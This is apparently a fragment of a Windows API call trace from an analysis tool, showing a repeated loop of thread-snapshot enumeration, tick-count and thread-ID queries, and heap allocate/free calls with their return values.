1 [0230.596] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.597] GetTickCount () returned 0x1139ac9 [0230.597] GetCurrentThreadId () returned 0x314 [0230.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.597] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.598] GetTickCount () returned 0x1139ac9 [0230.598] GetCurrentThreadId () returned 0x314 [0230.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.598] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.599] GetTickCount () returned 0x1139ac9 [0230.599] GetCurrentThreadId () returned 0x314 [0230.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.599] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.601] GetTickCount () returned 0x1139ac9 [0230.601] GetCurrentThreadId () returned 0x314 [0230.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.601] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.602] GetTickCount () returned 0x1139ad9 [0230.602] GetCurrentThreadId () returned 0x314 [0230.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.602] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.603] GetTickCount () returned 0x1139ad9 [0230.603] GetCurrentThreadId () returned 0x314 [0230.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.603] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.604] GetTickCount () returned 0x1139ad9 [0230.604] GetCurrentThreadId () returned 0x314 [0230.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.604] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.606] GetTickCount () returned 0x1139ad9 [0230.606] GetCurrentThreadId () returned 0x314 [0230.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.606] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.607] GetTickCount () returned 0x1139ad9 [0230.607] GetCurrentThreadId () returned 0x314 [0230.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.607] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.608] GetTickCount () returned 0x1139ad9 [0230.608] GetCurrentThreadId () returned 0x314 [0230.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.608] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.609] GetTickCount () returned 0x1139ad9 [0230.609] GetCurrentThreadId () returned 0x314 [0230.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.609] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.610] GetTickCount () returned 0x1139ad9 [0230.611] GetCurrentThreadId () returned 0x314 [0230.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.611] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.612] GetTickCount () returned 0x1139ad9 [0230.612] GetCurrentThreadId () returned 0x314 [0230.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.612] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.613] GetTickCount () returned 0x1139ad9 [0230.613] GetCurrentThreadId () returned 0x314 [0230.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.613] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.614] GetTickCount () returned 0x1139ad9 [0230.614] GetCurrentThreadId () returned 0x314 [0230.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.614] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.615] GetTickCount () returned 0x1139ad9 [0230.615] GetCurrentThreadId () returned 0x314 [0230.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.616] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.617] GetTickCount () returned 0x1139ad9 [0230.617] GetCurrentThreadId () returned 0x314 [0230.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.617] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.618] GetTickCount () returned 0x1139ae9 [0230.618] GetCurrentThreadId () returned 0x314 [0230.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.618] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.619] GetTickCount () returned 0x1139ae9 [0230.619] GetCurrentThreadId () returned 0x314 [0230.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.619] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.620] GetTickCount () returned 0x1139ae9 [0230.620] GetCurrentThreadId () returned 0x314 [0230.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.621] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.622] GetTickCount () returned 0x1139ae9 [0230.622] GetCurrentThreadId () returned 0x314 [0230.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.622] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.623] GetTickCount () returned 0x1139ae9 [0230.623] GetCurrentThreadId () returned 0x314 [0230.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.623] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.624] GetTickCount () returned 0x1139ae9 [0230.624] GetCurrentThreadId () returned 0x314 [0230.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.624] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.625] GetTickCount () returned 0x1139ae9 [0230.625] GetCurrentThreadId () returned 0x314 [0230.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.625] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.626] GetTickCount () returned 0x1139ae9 [0230.627] GetCurrentThreadId () returned 0x314 [0230.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.627] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.628] GetTickCount () returned 0x1139ae9 [0230.628] GetCurrentThreadId () returned 0x314 [0230.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.628] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.629] GetTickCount () returned 0x1139ae9 [0230.629] GetCurrentThreadId () returned 0x314 [0230.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.629] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.630] GetTickCount () returned 0x1139ae9 [0230.630] GetCurrentThreadId () returned 0x314 [0230.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.630] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.631] GetTickCount () returned 0x1139ae9 [0230.631] GetCurrentThreadId () returned 0x314 [0230.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.632] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.633] GetTickCount () returned 0x1139ae9 [0230.633] GetCurrentThreadId () returned 0x314 [0230.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.633] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.634] GetTickCount () returned 0x1139af8 [0230.634] GetCurrentThreadId () returned 0x314 [0230.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.634] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.635] GetTickCount () returned 0x1139af8 [0230.635] GetCurrentThreadId () returned 0x314 [0230.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.635] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.636] GetTickCount () returned 0x1139af8 [0230.636] GetCurrentThreadId () returned 0x314 [0230.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.636] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.638] GetTickCount () returned 0x1139af8 [0230.638] GetCurrentThreadId () returned 0x314 [0230.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.638] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.639] GetTickCount () returned 0x1139af8 [0230.639] GetCurrentThreadId () returned 0x314 [0230.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.639] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.640] GetTickCount () returned 0x1139af8 [0230.640] GetCurrentThreadId () returned 0x314 [0230.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.640] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.641] GetTickCount () returned 0x1139af8 [0230.641] GetCurrentThreadId () returned 0x314 [0230.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.641] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.642] GetTickCount () returned 0x1139af8 [0230.643] GetCurrentThreadId () returned 0x314 [0230.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.643] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.644] GetTickCount () returned 0x1139af8 [0230.644] GetCurrentThreadId () returned 0x314 [0230.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.644] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.645] GetTickCount () returned 0x1139af8 [0230.645] GetCurrentThreadId () returned 0x314 [0230.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.645] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.645] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.646] GetTickCount () returned 0x1139af8 [0230.646] GetCurrentThreadId () returned 0x314 [0230.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.646] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.646] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.647] GetTickCount () returned 0x1139af8 [0230.647] GetCurrentThreadId () returned 0x314 [0230.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.648] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.649] GetTickCount () returned 0x1139b08 [0230.649] GetCurrentThreadId () returned 0x314 [0230.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.649] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.650] GetTickCount () returned 0x1139b08 [0230.650] GetCurrentThreadId () returned 0x314 [0230.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.650] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.651] GetTickCount () returned 0x1139b08 [0230.651] GetCurrentThreadId () returned 0x314 [0230.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.651] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.652] GetTickCount () returned 0x1139b08 [0230.652] GetCurrentThreadId () returned 0x314 [0230.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.652] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.653] GetTickCount () returned 0x1139b08 [0230.653] GetCurrentThreadId () returned 0x314 [0230.653] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.653] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.654] GetTickCount () returned 0x1139b08 [0230.654] GetCurrentThreadId () returned 0x314 [0230.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.655] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.656] GetTickCount () returned 0x1139b08 [0230.656] GetCurrentThreadId () returned 0x314 [0230.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.656] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.657] GetTickCount () returned 0x1139b08 [0230.657] GetCurrentThreadId () returned 0x314 [0230.657] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.657] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.658] GetTickCount () returned 0x1139b08 [0230.658] GetCurrentThreadId () returned 0x314 [0230.658] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.658] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.658] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.659] GetTickCount () returned 0x1139b08 [0230.659] GetCurrentThreadId () returned 0x314 [0230.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.660] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.661] GetTickCount () returned 0x1139b08 [0230.661] GetCurrentThreadId () returned 0x314 [0230.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.661] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.662] GetTickCount () returned 0x1139b08 [0230.662] GetCurrentThreadId () returned 0x314 [0230.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.662] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.663] GetTickCount () returned 0x1139b08 [0230.663] GetCurrentThreadId () returned 0x314 [0230.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.663] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.665] GetTickCount () returned 0x1139b17 [0230.665] GetCurrentThreadId () returned 0x314 [0230.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.665] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.666] GetTickCount () returned 0x1139b17 [0230.666] GetCurrentThreadId () returned 0x314 [0230.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.666] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.667] GetTickCount () returned 0x1139b17 [0230.667] GetCurrentThreadId () returned 0x314 [0230.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.667] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.668] GetTickCount () returned 0x1139b17 [0230.668] GetCurrentThreadId () returned 0x314 [0230.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.669] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.670] GetTickCount () returned 0x1139b17 [0230.670] GetCurrentThreadId () returned 0x314 [0230.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.670] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.671] GetTickCount () returned 0x1139b17 [0230.671] GetCurrentThreadId () returned 0x314 [0230.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.671] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.672] GetTickCount () returned 0x1139b17 [0230.672] GetCurrentThreadId () returned 0x314 [0230.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.672] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.673] GetTickCount () returned 0x1139b17 [0230.673] GetCurrentThreadId () returned 0x314 [0230.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.673] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.674] GetTickCount () returned 0x1139b17 [0230.675] GetCurrentThreadId () returned 0x314 [0230.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.675] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.676] GetTickCount () returned 0x1139b17 [0230.676] GetCurrentThreadId () returned 0x314 [0230.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.676] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.677] GetTickCount () returned 0x1139b17 [0230.677] GetCurrentThreadId () returned 0x314 [0230.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.677] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.678] GetTickCount () returned 0x1139b17 [0230.678] GetCurrentThreadId () returned 0x314 [0230.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.678] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.679] GetTickCount () returned 0x1139b17 [0230.679] GetCurrentThreadId () returned 0x314 [0230.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.680] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.681] GetTickCount () returned 0x1139b27 [0230.681] GetCurrentThreadId () returned 0x314 [0230.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.681] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.682] GetTickCount () returned 0x1139b27 [0230.682] GetCurrentThreadId () returned 0x314 [0230.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.682] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.683] GetTickCount () returned 0x1139b27 [0230.683] GetCurrentThreadId () returned 0x314 [0230.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.683] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.684] GetTickCount () returned 0x1139b27 [0230.684] GetCurrentThreadId () returned 0x314 [0230.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.684] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.684] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.686] GetTickCount () returned 0x1139b27 [0230.686] GetCurrentThreadId () returned 0x314 [0230.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 